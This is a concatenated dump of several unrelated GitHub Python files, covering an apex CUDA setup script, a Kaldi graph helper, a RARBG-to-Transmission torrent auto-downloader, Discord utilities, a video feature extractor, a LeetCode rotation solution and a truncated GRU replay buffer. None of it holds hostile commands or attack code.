paths_target_apk_dirs[0]\n    paths_apk_secondary = paths_target_apk_dirs[1:]\n\n    for paths_apk_secondary in paths_apk_secondary:\n        merge_apk_contents(path_apk_main, paths_apk_secondary)\n\n    delete_signature_related_files(path_apk_main)\n    update_main_manifest_file(path_apk_main)\n\n    build_single_apk(path_dir_tmp, path_apk_main, should_sign_apk, sign_properties)\n    copy_single_apk_to_working_dir(path_dir_tmp, cwd, const_file_result_file)\n\n    shutil.rmtree(path_dir_tmp)\n\n    print('[*] complete')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"LuigiVampa92/merge-apks","sub_path":"mergeapks.py","file_name":"mergeapks.py","file_ext":"py","file_size_in_byte":16663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"7649997947","text":"import re\n\nimport os\nimport shutil\nimport inspect\nimport platform\n\nimport distutils\nimport distutils.spawn\nfrom distutils.command.clean import clean\n\nfrom setuptools import setup, Extension, find_packages\nfrom setuptools.command.install import install\n\nimport subprocess\nimport ctypes.util\n\nimport torch\n\n#Takes a path to walk,\n#a function to decide whether to keep a file,\n#and collect=True if we want a list of all occurrences\ndef find(path, regex_func, collect=False):\n    collection = [] if collect else None\n    for root, dirs, files in os.walk(path):\n        for file in files:\n            if regex_func(file):\n                if collect:\n                    collection.append(os.path.join(root, file))\n                else:\n                    return os.path.join(root, file)\n    # return None when nothing matched and collect=False\n    return list(set(collection)) if collect else None\n\ndef find_nvcc():\n    # NOTE: this helper was missing from the file; assumed behavior is to return\n    # the directory containing the nvcc binary, so that findcuda's dirname()\n    # call below yields the CUDA root\n    nvcc = distutils.spawn.find_executable('nvcc')\n    return os.path.dirname(nvcc) if nvcc is not None else None\n\ndef findcuda():\n    CUDA_HOME = os.getenv('CUDA_HOME', '/usr/local/cuda')\n    if not os.path.exists(CUDA_HOME):\n        # We use nvcc path on Linux and cudart path on macOS\n        osname = platform.system()\n        if osname == 'Linux':\n            cuda_path = find_nvcc()\n        else:\n            cudart_path = ctypes.util.find_library('cudart')\n            if cudart_path is not None:\n                cuda_path = os.path.dirname(cudart_path)\n            else:\n                cuda_path = None\n        if cuda_path is not None:\n            CUDA_HOME = os.path.dirname(cuda_path)\n        else:\n            CUDA_HOME = None\n    WITH_CUDA = CUDA_HOME is not None\n    return CUDA_HOME\n\n\n\n#Get some important paths\n# curdir = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))\ncurdir = os.path.join(os.path.dirname(os.path.realpath(__file__)),\n                                 'apex_utils')\nos.chdir(curdir)\n\nbuildir = 
curdir+os.sep+\"build\"\nif not os.path.exists(buildir):\n os.makedirs(buildir)\n\ntorch_dir = os.path.split(torch.__file__)[0] + os.sep + \"lib\"\n\ncuda_files = find(curdir, lambda file: file.endswith(\".cu\"), True)\ncuda_headers = find(curdir, lambda file: file.endswith(\".cuh\"), True)\nheaders = find(curdir, lambda file: file.endswith(\".h\"), True)\n\nlibaten = find(torch_dir, re.compile(\"libaten\", re.IGNORECASE).search, False)\naten_h = find(torch_dir, re.compile(\"aten.h\", re.IGNORECASE).search, False)\n\ninclude_dirs = [os.path.dirname(os.path.dirname(aten_h))]\nlibrary_dirs = []\nfor file in cuda_headers+headers:\n dir = os.path.dirname(file)\n if dir not in include_dirs:\n include_dirs.append(dir)\n\nassert libaten, \"Could not find PyTorch's libATen.\"\nassert aten_h, \"Could not find PyTorch's ATen header.\"\n\nlibrary_dirs.append(os.path.dirname(libaten))\n\n#create some places to collect important things\nobject_files = []\nextra_link_args=[]\nmain_libraries = []\nmain_libraries += ['cudart', 'cuda', 'ATen']\nextra_compile_args = [\"--std=c++11\",]\n\n#findcuda returns root dir of CUDA\n#include cuda/include and cuda/lib64 for python module build.\nCUDA_HOME=findcuda()\nlibrary_dirs.append(os.path.join(CUDA_HOME, \"lib64\"))\ninclude_dirs.append(os.path.join(CUDA_HOME, 'include'))\n\nclass RMBuild(clean):\n def run(self):\n #BE VERY CAUTIOUS WHEN USING RMTREE!!!\n #These are some carefully written/crafted directories\n if os.path.exists(buildir):\n shutil.rmtree(buildir)\n \n distdir = curdir+os.sep+\"dist\"\n if os.path.exists(distdir):\n shutil.rmtree(distdir)\n\n eggdir = curdir+os.sep+\"apex.egg-info\"\n if os.path.exists(eggdir):\n shutil.rmtree(eggdir)\n clean.run(self)\n\ndef CompileCudaFiles():\n\n print()\n print(\"Compiling cuda modules with nvcc:\")\n #Need arches to compile for.\n nvcc_cmd = ['nvcc', \n '-Xcompiler', \n '-fPIC',\n '-gencode', 'arch=compute_52,code=sm_52',\n '-gencode', 'arch=compute_60,code=sm_60',\n '-gencode', 'arch=compute_61,code=sm_61',\n '-gencode', 'arch=compute_70,code=sm_70',\n '-gencode', 'arch=compute_70,code=compute_70',\n '--std=c++11',\n '-O3',\n ]\n \n for dir in include_dirs:\n nvcc_cmd.append(\"-I\"+dir)\n\n for file in cuda_files:\n object_name = os.path.basename(\n os.path.splitext(file)[0]+\".o\"\n )\n \n object_file = os.path.join(buildir, object_name)\n object_files.append(object_file)\n \n file_opts = ['-c', file, '-o', object_file]\n \n print(' '.join(nvcc_cmd+file_opts))\n subprocess.check_call(nvcc_cmd+file_opts)\n \n for object_file in object_files:\n extra_link_args.append(object_file)\n\n#print()\n#print(\"Arguments used to build CUDA extension:\")\n#print(\"extra_compile_args :\", extra_compile_args)\n#print(\"include_dirs: \", include_dirs)\n#print(\"extra_link_args: \", extra_link_args)\n#print(\"library_dirs: \", library_dirs)\n#print(\"libraries: \", main_libraries)\n#print()\n#CompileCudaFiles()\n\n#print(\"Building CUDA extension.\")\n#cuda_ext = Extension('apex._C',\n# [os.path.join('csrc', 'Module.cpp')],\n# extra_compile_args = extra_compile_args,\n# include_dirs=include_dirs,\n# extra_link_args=extra_link_args,\n# library_dirs=library_dirs,\n# runtime_library_dirs = library_dirs,\n# libraries=main_libraries\n# )\n\nprint(\"Building module.\")\nsetup(\n name='apex', version='0.1',\n cmdclass={\n 'clean' : RMBuild,\n }, \n# ext_modules=[cuda_ext,],\n description='PyTorch Extensions written by NVIDIA',\n packages=find_packages(where='.',\n exclude=(\"build\", \"csrc\", \"include\", \"tests\")),\n 
install_requires=[\n        \"numpy\",\n        \"pandas\",\n        \"scikit-learn\",\n        \"matplotlib\",\n        \"unidecode\",\n    ]\n)\n","repo_name":"AnastasiiaNovikova/sentiment-discovery","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"}
{"seq_id":"19376835055","text":"import os\nimport abkhazia.utils as utils\nimport abkhazia.kaldi as kaldi\n\n\ndef options():\n    \"\"\"Return default parameters for the mkgraph script\"\"\"\n    opt = kaldi.options.make_option\n\n    return {k: v for k, v in (\n        opt('transition-scale', default=1.0, type=float,\n            help='Transition-probability scale'),\n        opt('self-loop-scale', default=0.1, type=float,\n            help='Scale of self-loop versus non-self-loop log probs'),\n        opt('reverse', default=False, type=bool,\n            help='Build a time-reversed H transducer'))}\n\n\ndef mkgraph(decoder, verbose=True):\n    decoder.log.info('computing full decoding graph')\n\n    opts = decoder.mkgraph_opts\n\n    target = os.path.join(decoder.recipe_dir, 'graph')\n    if not os.path.isdir(target):\n        os.makedirs(target)\n\n    command = (\n        '{cmd} {log} utils/mkgraph.sh {mono} {reverse} '\n        '--transition-scale {tscale} --self-loop-scale {slscale} '\n        '{lang} {model} {graph}'.format(\n            cmd=os.path.join(\n                'utils', utils.config.get('kaldi', 'highmem-cmd')),\n            log=os.path.join(target, 'mkgraph.log'),\n            mono='--mono' if decoder.am_type == 'mono' else '',\n            reverse='--reverse' if opts['reverse'].value else '',\n            tscale=str(opts['transition-scale']),\n            slscale=str(opts['self-loop-scale']),\n            lang=decoder.lm_dir,\n            model=decoder.am_dir,\n            graph=target))\n\n    decoder._run_command(command, verbose=verbose)\n\n    return target\n","repo_name":"bootphon/abkhazia","sub_path":"abkhazia/decode/_mkgraph.py","file_name":"_mkgraph.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"}
{"seq_id":"36181622825","text":"import os\nimport re\nimport platform\nimport threading\nimport time\nimport datetime\nimport rarbgapi\nimport pprint\nimport json\nfrom clutch import core\nfrom PTN.parse import PTN\n\ndef read_json(file_path=\"\"):\n\n    if file_path and os.path.exists(file_path):\n        with open(file_path, \"r\") as file_:\n            return json.loads(file_.read())\n    return {}\n\nCONFIG = read_json(\"config.json\")\nCACHE_FILE = \".downloaded\"\n\ndef get_csv_rows(file_path=\"\", delimiter=\",\"):\n    lst_result = []\n\n    if file_path and os.path.exists(file_path):\n        with open(file_path, \"r\") as file_:\n            dict_index = {}\n            for line_ in file_.readlines():\n                line_ = f\"{line_}\".strip(\"\\n\").strip(\"\\r\")\n\n                if line_:\n                    lst_line_split = f\"{line_}\".split(delimiter)\n                    if not dict_index:\n                        for i in range(len(lst_line_split)):\n                            dict_index[i] = lst_line_split[i]\n                    else:\n                        dict_data = {}\n                        for i in range(len(lst_line_split)):\n                            dict_data[dict_index[i]] = lst_line_split[i]\n\n                        if dict_data:\n                            lst_result.append(dict_data)\n\n    return lst_result\n\n\ndef get_download_dir(search_name=\"\", relative_dir=\"\", *args, **kwargs):\n\n    result = \"\"\n\n    if search_name:\n        lst_search_name_split = re.split(\"[._ ]+\", str(search_name).lower())\n\n        share_drive_dir = \"\"\n        if platform.system() == \"Windows\":\n            share_drive_dir = CONFIG[\"share_drive\"][\"win_path\"]\n        else:\n            share_drive_dir = CONFIG[\"share_drive\"][\"linux_path\"]\n\n\n        if share_drive_dir and os.path.exists(share_drive_dir):\n\n            download_dir = os.path.join(share_drive_dir, relative_dir)\n            
download_dir = os.path.abspath(download_dir)\n\n for parent_dir_, dirs_, files_ in os.walk(download_dir):\n this_dir = parent_dir_\n found = False\n for dir_ in dirs_:\n lst_dir_split = re.split(\"[._ ]+\", str(dir_).lower())\n lst_inter = list(set(lst_search_name_split) & set(lst_dir_split))\n if lst_inter and len(lst_inter) == len(lst_search_name_split):\n found = True\n this_dir = os.path.join(parent_dir_, dir_)\n break\n\n if found:\n result = this_dir\n\n if not result:\n folder_name = \".\".join([str(part).title() for part in lst_search_name_split])\n result = os.path.join(download_dir, folder_name)\n if not os.path.exists(result):\n # os.mkdir(result)\n print (\"Created: {0}\".format(result))\n\n return result\n\ndef get_shared_items(d1={}, d2={}):\n return {k: d1[k] for k in d1 if k in d2 and d1[k] == d2[k]}\n\ndef get_torrents(search_string=\"\", download_dir=\"\", converter_name=\"\", *args, **kwargs):\n\n dict_torrents = {}\n\n # RarBg\n rarbg_client = rarbgapi.RarbgAPI()\n\n search_string_parser = PTN()\n dict_search_string_values = search_string_parser.parse(search_string)\n\n # category = [rarbg_client.CATEGORY_TV_EPISODES_UHD, rarbg_client.CATEGORY_TV_EPISODES_HD, rarbg_client.CATEGORY_TV_EPISODES]\n torrent_parser = PTN()\n\n dict_group_torrents = {}\n\n # Group torrents by season, episode\n lst_torrent = rarbg_client.search(search_string=search_string, limit=100)\n if lst_torrent:\n for torrent_ in sorted(lst_torrent, key=lambda item: item.filename):\n\n dict_torrent_values = torrent_parser.parse(name=torrent_.filename)\n shared_items = get_shared_items(dict_search_string_values, dict_torrent_values)\n dict_torrent_values.update(torrent_._raw)\n\n state_keys = len(shared_items) == len(dict_search_string_values)\n state_name = str(torrent_.filename).lower().startswith(search_string.lower().replace(\" \", \".\"))\n\n if not (state_keys or state_name and \"resolution\" in dict_torrent_values):\n continue\n\n dict_torrent_values[\"download_dir\"] = download_dir\n\n is_combined = False\n key = None\n if \"tv\" in dict_torrent_values[\"category\"].lower():\n key = (dict_torrent_values['title'], \"tv\")\n is_combined = True\n elif 'season' in dict_torrent_values and 'episode' in dict_torrent_values:\n key = (dict_torrent_values['title'], dict_torrent_values['season'], dict_torrent_values['episode'])\n elif \"movies\" in \"{0}\".format(dict_torrent_values[\"category\"].lower()).split(\"/\"):\n key = (dict_torrent_values['title'], \"movies\")\n is_combined = True\n\n if key:\n dict_torrent_values[\"key_name\"] = key\n\n if key not in dict_group_torrents:\n dict_group_torrents[key] = []\n dict_group_torrents[key].append(dict_torrent_values)\n\n if is_combined:\n break\n\n\n # Get the best resolution and converter name by every key (season, episode)\n for key_name_, lst_data_ in dict_group_torrents.items():\n lst_data_.sort(key=lambda item: item[\"resolution\"] if \"resolution\" in item else item[\"filename\"])\n\n dict_torrent = lst_data_[0]\n\n if converter_name:\n for dict_torrent_ in lst_data_:\n\n converter_name_value_ = None\n if \"excess\" in dict_torrent_:\n converter_name_value_ = dict_torrent_[\"excess\"]\n\n if \"group\" in dict_torrent_:\n converter_name_value_ = dict_torrent_[\"group\"]\n\n if isinstance(converter_name_value_, str):\n converter_name_value_ = [converter_name_value_]\n\n found = False\n for conv_name_value_ in converter_name_value_:\n if str(conv_name_value_).endswith(converter_name):\n found = True\n break\n if found:\n dict_torrent = dict_torrent_\n 
break\n\n dict_torrents[key_name_] = dict_torrent\n\n return dict_torrents\n\ndef add_torrents(tc_client=None, lst_torrent=[]):\n\n if tc_client and lst_torrent:\n print(\"Add into torrent transmitter...\")\n\n # Add into torrent transmission\n rbr = 0\n for dict_torrent_ in lst_torrent:\n # priority\n dict_data = {}\n dict_data[\"filename\"] = dict_torrent_[\"download\"]\n dict_data[\"download-dir\"] = dict_torrent_[\"download_dir\"]\n dict_data['priority'] = \"low\"\n if rbr <= 2:\n dict_data['priority'] = \"high\"\n elif rbr <= 4:\n dict_data['priority'] = \"normal\"\n\n print (f\"Add {dict_data}\")\n # tc_client.torrent.add(**dict_data)\n\n rbr += 1\n\ndef auto_download():\n\n\n tc_client = core.Client(address=CONFIG[\"url\"], username='admin', password='openmediavault')\n dt_end = datetime.datetime.now()\n\n while True:\n\n if datetime.datetime.now() >= dt_end:\n\n lst_all_downloaded = []\n if os.path.exists(CACHE_FILE):\n with open(CACHE_FILE, \"r\") as file_:\n lst_all_downloaded = [tuple(item_) for item_ in json.loads(file_.read())]\n\n for dict_data_ in get_csv_rows(\"input.csv\"):\n\n download_dir = get_download_dir(**dict_data_)\n\n converter_name = dict_data_[\"converter_name\"] if \"converter_name\" in dict_data_ else \"\"\n\n dict_torrents = get_torrents(search_string=dict_data_[\"search_name\"], download_dir=download_dir, converter_name=converter_name)\n\n lst_diff = list(set(dict_torrents.keys()) - set(lst_all_downloaded))\n\n add_torrents(tc_client=tc_client, lst_torrent=[dict_torrents[key] for key in lst_diff])\n lst_all_downloaded += lst_diff\n\n with open(CACHE_FILE, \"w+\", encoding='utf-8') as file_:\n json.dump(lst_all_downloaded, file_, ensure_ascii=False, indent=4)\n\n dt_end += datetime.timedelta(minutes=15)\n else:\n print (f\"Next round: {dt_end}\")\n\n time.sleep(25)\n\n\ndef main():\n\n thread_auto_dl = threading.Thread(target=auto_download)\n thread_auto_dl.start()\n\nif __name__ == '__main__':\n main()","repo_name":"softwaresky/AutoDownloadTorrents","sub_path":"DownloadTorrent.py","file_name":"DownloadTorrent.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28397602104","text":"import datetime\r\nfrom discord.utils import get\r\n\r\n\r\ndef get_time():\r\n now = datetime.datetime.now()\r\n hours = str(now.hour)\r\n if len(hours) == 1:\r\n hours = '0' + hours\r\n minutes = str(now.minute)\r\n if len(minutes) == 1:\r\n minutes = '0' + minutes\r\n seconds = str(now.second)\r\n if len(seconds) == 1:\r\n seconds = '0' + seconds\r\n day = str(now.day)\r\n if len(day) == 1:\r\n day = '0' + day\r\n month = str(now.month)\r\n if len(month) == 1:\r\n month = '0' + month\r\n year = str(now.year)\r\n clock = '[{0}.{1}.{2} {3}:{4}:{5}]'.format(day, month, year, hours, minutes, seconds)\r\n return clock\r\n\r\n\r\ndef catch_role(message, rolename):\r\n member = message.author\r\n catchedrole = get(member.guild.roles, name=rolename)\r\n return catchedrole\r\n\r\n\r\ndef catch_channel(message, channelid):\r\n member = message.author\r\n catchedchannel = get(member.guild.channels, id=channelid)\r\n return catchedchannel\r\n","repo_name":"Luk3Pl4ys/Discord-Bot","sub_path":"Functions/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35941430184","text":"import csv\r\nimport glob\r\nimport os\r\nimport pathlib\r\nfrom subprocess import 
call\r\nfrom itertools import chain\r\nfrom extractor import Extractor\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport random\r\n\r\n\r\nclass VideoFeatureExtractor():\r\n def __init__(self, video_root_dir, database_name, seq_length, model_dir):\r\n self.dir_path = os.path.dirname(os.path.realpath(__file__))\r\n pathlib.Path(os.path.join(self.dir_path, 'data', database_name)).mkdir(\r\n parents=True, exist_ok=True)\r\n pathlib.Path(os.path.join(self.dir_path, 'data', 'sequences')).mkdir(\r\n parents=True, exist_ok=True)\r\n self.root_dir = video_root_dir\r\n self.database = database_name\r\n self.seq_length = seq_length\r\n self.data_path = self.dir_path + '\\\\data'\r\n self.model_dir = model_dir\r\n self.dataset_infro = []\r\n self.extract_files\r\n self.extract_features\r\n\r\n @ property\r\n def extract_files(self):\r\n classes_videos_folders = glob.glob(self.root_dir + '\\\\' + '*')\r\n self.classes = self.get_classes(classes_videos_folders)\r\n for class_videos in classes_videos_folders:\r\n videos_per_class = glob.glob(class_videos + '\\\\*.avi')\r\n\r\n for video_path in videos_per_class:\r\n video_information = self.get_video_parts(video_path)\r\n databasename, classname, filename_no_ext, filename, \\\r\n _ = video_information\r\n pathlib.Path(os.path.join(self.data_path, databasename,\r\n classname)).mkdir(parents=True, exist_ok=True)\r\n if not self.check_already_extracted(video_information):\r\n src = self.root_dir + '\\\\' + classname + '\\\\' + \\\r\n \t\t filename\r\n\r\n dest = self.data_path + '\\\\' + databasename + '\\\\' + \\\r\n classname + '\\\\' + filename_no_ext + '-%04d.jpg'\r\n call([\"ffmpeg\", \"-i\", src, dest])\r\n\r\n # Now get how many frames it is.\r\n nb_frames = self.get_nb_frames_for_video(video_information)\r\n self.dataset_infro.append([classname,\r\n filename_no_ext,\r\n nb_frames,\r\n self.get_class_index(classname)])\r\n random.shuffle(self.dataset_infro)\r\n with open(os.path.join(self.data_path,self.database +'.csv'),\r\n 'w', newline='') as fout:\r\n writer = csv.writer(fout)\r\n writer.writerows(self.dataset_infro)\r\n\r\n def get_classes(self, classes_video_folders):\r\n classes = []\r\n for item in classes_video_folders:\r\n classes.append(item.split('\\\\')[-1])\r\n classes = sorted(classes)\r\n return classes\r\n\r\n def get_class_index(self, class_str):\r\n return self.classes.index(class_str)\r\n\r\n\r\n @ property\r\n def extract_features(self):\r\n # build model for feature extraction\r\n feature_extractor = Extractor(self.model_dir)\r\n # Loop through data.\r\n pbar = tqdm(total=len(self.dataset_infro))\r\n for each_video in self.dataset_infro:\r\n print(each_video)\r\n path = self.data_path + '\\\\sequences\\\\' + each_video[1] + \\\r\n '-' + str(self.seq_length) + '-features.txt'\r\n\r\n if os.path.isfile(path):\r\n pbar.update(1)\r\n continue\r\n\r\n frames = self.get_frames_for_sample(each_video)\r\n frames = self.rescale_list(frames, self.seq_length)\r\n\r\n # Now loop through and extract features to build the sequence\r\n sequence = []\r\n for image in frames:\r\n features = feature_extractor.inception(image)\r\n sequence.append(features)\r\n npsquence = np.array(sequence)\r\n\r\n # save the sequence\r\n np.savetxt(path, sequence)\r\n\r\n pbar.update(1)\r\n pbar.close()\r\n\r\n def get_frames_for_sample(self, video_infro):\r\n \"\"\"\r\n Given a sample row from the data file, get all the corrsponding frame\r\n filenames.\r\n \"\"\"\r\n path = os.path.join(self.data_path, self.database,\r\n video_infro[0], 
video_infro[1])\r\n        images = sorted(glob.glob(path + '*jpg'))\r\n        return images\r\n\r\n\r\n    def get_video_parts(self, video_path):\r\n    \t\"\"\"Given a full path to a video, return its parts.\"\"\"\r\n    \tparts = video_path.split('\\\\')\r\n    \tfilename = parts[-1]\r\n    \tfilename_no_ext = parts[-1].split('.')[0]\r\n    \tpersonname = filename_no_ext.split('_')[0]\r\n    \tclassname = parts[-2]\r\n    \tdatabasename = self.database\r\n\r\n    \treturn databasename, classname, filename_no_ext, filename, personname\r\n\r\n\r\n    def check_already_extracted(self, video_parts):\r\n    \t\"\"\"Check to see if we created the -0001 frame of this file.\"\"\"\r\n    \tdatabasename, classname, filename_no_ext, _, _ = video_parts\r\n    \treturn bool(os.path.exists(self.data_path + databasename + '\\\\' +\r\n classname + '\\\\' + filename_no_ext + '-0001.jpg'))\r\n\r\n    def get_nb_frames_for_video(self, video_parts):\r\n    \t\"\"\"Given video parts of an (assumed) already extracted video,\r\n    \t return the number of frames that were extracted.\"\"\"\r\n    \tdatabasename, classname, filename_no_ext, _, _ = video_parts\r\n    \tgenerated_files = glob.glob(self.data_path + '\\\\' + databasename + \\\r\n '\\\\' + classname + '\\\\' + filename_no_ext + '*.jpg')\r\n    \treturn len(generated_files)\r\n\r\n    def rescale_list(self, input_list, size):\r\n        \"\"\"\r\n        Given a list and a size, return a rescaled/samples list. For example, if\r\n        we want a list of size 5 and we have a list of size 25, return a new\r\n        list of size which is every 5th element of the origina list.\r\n        \"\"\"\r\n\r\n        if len(input_list) >= size:\r\n            # Get the number to skip between iterations.\r\n            skip = len(input_list) // size\r\n\r\n            # Build our new output.\r\n            output = [input_list[i] for i in range(0, len(input_list), skip)]\r\n        else:\r\n            temp = []\r\n            copy = size // len(input_list)\r\n            for a_input in input_list:\r\n                temp.append([a_input] * copy)\r\n            while len(temp) < size:\r\n                temp.append([input_list[-1]])\r\n            output = list(chain.from_iterable(temp))\r\n        return output[:size]\r\n\r\n    def get_extracted_sequence(self, sample):\r\n        filename = sample['video']\r\n        path = self.data_path + '\\\\sequences\\\\' + filename + '-' + \\\r\n str(self.seq_length) + '-' + 'features' + '.txt'\r\n        if os.path.isfile(path):\r\n            features = pd.read_csv(path, sep=\" \", header=None)\r\n            return features.values\r\n        else:\r\n            return None\r\n\r\ndef main():\r\n    video_root_dir = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\cnn_lstm\\\\data\\\\HMDB'\r\n    database_name = 'HMDB'\r\n    seq_length = 50\r\n    model_dir = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\inception-2015-12-05'\r\n    VideoFeatureExtractor(video_root_dir, database_name,\r\n seq_length, model_dir)\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","repo_name":"TangxinKevin/RGB_action_recognition","sub_path":"video_feature_extractor.py","file_name":"video_feature_extractor.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
+{"seq_id":"1156303043","text":"import os\nimport numpy as np\nfrom alignment_helper_fns import *\nfrom audio_utils import *\n\naudio_dir = '/home/prad/datasets/ChildSpeechDataset/child_speech_16_khz'\nmanual_textgrids_dir = '/home/prad/datasets/ChildSpeechDataset/manually-aligned-text-grids/'\nmfa_sat_dir = '/home/prad/datasets/ChildSpeechDataset/mfa_adapted/'\n# mfa_sat_dir = '/home/prad/datasets/ChildSpeechDataset/mfa_with_sat/'\n\nunmatched_manual_textgrid_files = get_all_textgrids_in_directory(manual_textgrids_dir)\naligner_textgrid_files = get_all_textgrids_in_directory(mfa_sat_dir)\ncandidate_aligner_textgrid_files = get_all_textgrids_in_directory(mfa_sat_dir)\nmanual_textgrid_files = []\naudio_files = ['/'.join([audio_dir,_path.split('/')[-2], _path.split('/')[-1][:-8]+'wav'])\n for _path in unmatched_manual_textgrid_files]\n\nfrom create_child_speech_dataset import *\n# csd = ChildSpeechDataset(audio_paths=audio_files)\n\n'''\nneed to match the corresponding files since the files loaded from the code above are out of order\n'''\nmismatched_phoneme = 0\nmismatched_lengths = 0\nprint(len(aligner_textgrid_files))\nfor ii, aligned_tg_file in tqdm.tqdm(enumerate(aligner_textgrid_files)):\n# print(ii)\n    _filename = aligned_tg_file.split('/')[-1].replace('-', '_')\n# print(_filename)\n    matching_ind = int(np.argwhere([_filename in manual_file for manual_file in unmatched_manual_textgrid_files]).ravel())\n# print(matching_ind)\n    matching_gt_file = unmatched_manual_textgrid_files[matching_ind]\n    manual_textgrid_files.append(matching_gt_file)\n\ntranscripts = {}\n\n''' Extract transcripts for w2v2 aligner'''\ntranscripts = {}\nfor filename in audio_files:\n    fname = filename.split('/')[-1]\n    # speaker_dir = filename.split('/')[-2]\n    # print(fname)\n    # fname = os.path.join(manual_textgrids_dir, speaker_dir, fname[:-8]+'lab')\n    fname = filename[:-3] + 'lab'\n    # print(fname)\n    # break\n    f = open(fname)\n    _transcript = f.read()\n    # print(_transcript)\n    transcripts[filename] = _transcript[:-1]\n    # break\n\n''' Charsiu setup'''\nfrom src.Charsiu import charsiu_forced_aligner, charsiu_attention_aligner\n# charsiu = charsiu_forced_aligner(aligner='charsiu/en_w2v2_fc_10ms')\nfrom alignment_helper_fns import *\ncharsiu = charsiu_forced_aligner('charsiu/en_w2v2_fc_10ms')\n# charsiu = charsiu_attention_aligner('charsiu/en_w2v2_fs_10ms')\n\ncharisu_tg_files = []\nerror_files = []\ndo_align = True\nif do_align:\n    for ii, tgfilepath in tqdm.tqdm(enumerate(manual_textgrid_files)):\n        audiofname = tgfilepath.split('/')[-1][:-8] + 'wav'\n        speaker_dir = tgfilepath.split('/')[-2]\n        tgfilename = tgfilepath.split('/')[-1]\n        # audio_path = os.path.join(audio_dir, speaker_dir, audiofname)\n        audio_path = audio_files[ii]\n\n        output_tg_dir = os.path.join('results/charsiu_w2v2_attention_aligner_10ms/', speaker_dir)\n        if not os.path.isdir(output_tg_dir):\n            os.makedirs(output_tg_dir, exist_ok=True)\n\n        tg_filepath = os.path.join(output_tg_dir, tgfilename)\n        _transcript = transcripts[audio_path]\n\n        charisu_tg_files.append(tg_filepath)\n        # print('************************************************************************')\n        # print(audio_path)\n        # print(tgfilename)\n        # print(_transcript)\n        # print(textgridpath_to_phonedf(tgfilepath, phone_key='ha phones'))\n\n        # print(tg_filepath)\n        try:\n            #pd.DataFrame(charsiu.align(audio=audio_path,text=_transcript)[0])\n            charsiu.serve(audio = audio_path, text = _transcript, save_to = tg_filepath)\n\n        except Exception:\n            print('Could not perform alignment for file:\\t ', audio_path)\n            error_files.append(tgfilepath)\nestimated_textgrids = [os.path.join('results/charsiu_w2v2_attention_aligner_10ms/', path.split('/')[-2], path.split('/')[-1]) for path in manual_textgrid_files]\nfrom alignment_helper_fns import calc_accuracy_between_textgrid_lists\ncalc_accuracy_between_textgrid_lists(manual_textgrid_files, estimated_textgrids)\n\n\n\n\n\n","repo_name":"pkadambi/charsiu","sub_path":"charsiu_test.py","file_name":"charsiu_test.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"}
+{"seq_id":"42601824373","text":"\"\"\"\nhttps://leetcode.com/problems/rotate-image/\nRuntime: 36 ms, faster than 37.11% of Python3 online submissions for Rotate Image.\nMemory Usage: 12.8 MB, less than 100.00% of Python3 online submissions for Rotate Image.\n\"\"\"\n\n\nclass Solution:\n    def rotate(self, matrix: List[List[int]]) -> None:\n        \"\"\"\n        Do not return anything, modify matrix in-place instead.\n        \"\"\"\n        n = len(matrix)\n        for r in range(int(n / 2)):\n            for c in range(r, n - r - 1):\n                temp = matrix[r][c]\n                matrix[r][c] = matrix[n - 1 - c][r]\n                matrix[n - 1 - c][r] = matrix[n - 1 - r][n - 1 - c]\n                matrix[n - 1 - r][n - 1 - c] = matrix[c][n - 1 - r]\n                matrix[c][n - 1 - r] = temp\n    \n","repo_name":"google-gazzza/algorithm","sub_path":"leetcode/medium/48_rotate_image/hsh2438.py","file_name":"hsh2438.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"}
+{"seq_id":"11049135896","text":"import torch\nimport numpy as np\nimport torch.nn.functional as F\nimport random\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.distributions import Normal\nfrom functions.LSTM_functions import *\n\n\n\n\ndevice = torch.device(\"cuda:\" + str(0))\n# device = \"mps\" if torch.backends.mps.is_available() else \"cpu\"\n\n\n\n\n\nclass ReplayBufferGRU:\n    \"\"\" \n    Replay buffer for agent with GRU network additionally storing previous action, \n    initial input hidden state and output hidden state of GRU.\n    And each sample contains the whole episode instead of a single step.\n    'hidden_in' and 'hidden_out' are only the initial hidden state for each episode, for GRU initialization.\n    \"\"\"\n    def __init__(self, capacity):\n        self.capacity = capacity\n        self.buffer = []\n        self.position = 0\n\n    def push(self, hidden_in, hidden_out, state, action, last_action, reward, next_state, done):\n        if len(self.buffer) < self.capacity:\n            self.buffer.append(None)\n        self.buffer[self.position] = (hidden_in, hidden_out, state, action, last_action, reward, next_state, done)\n        self.position = int((self.position + 1) % self.capacity)  # as a ring buffer\n\n    def sample(self, batch_size):\n        s_lst, a_lst, la_lst, r_lst, ns_lst, hi_lst, ho_lst, d_lst=[],[],[],[],[],[],[],[]\n        batch = random.sample(self.buffer, batch_size)\n        for sample in batch:\n            h_in, h_out, state, action, last_action, reward, next_state, done = sample\n            s_lst.append(state) \n            a_lst.append(action)\n            la_lst.append(last_action)\n            r_lst.append(reward)\n            ns_lst.append(next_state)\n            d_lst.append(done)\n            hi_lst.append(h_in)  # h_in: (1, batch_size=1, hidden_size)\n            ho_lst.append(h_out)\n        hi_lst = torch.cat(hi_lst, dim=-2).detach()  # cat along the batch dim\n        ho_lst = torch.cat(ho_lst, 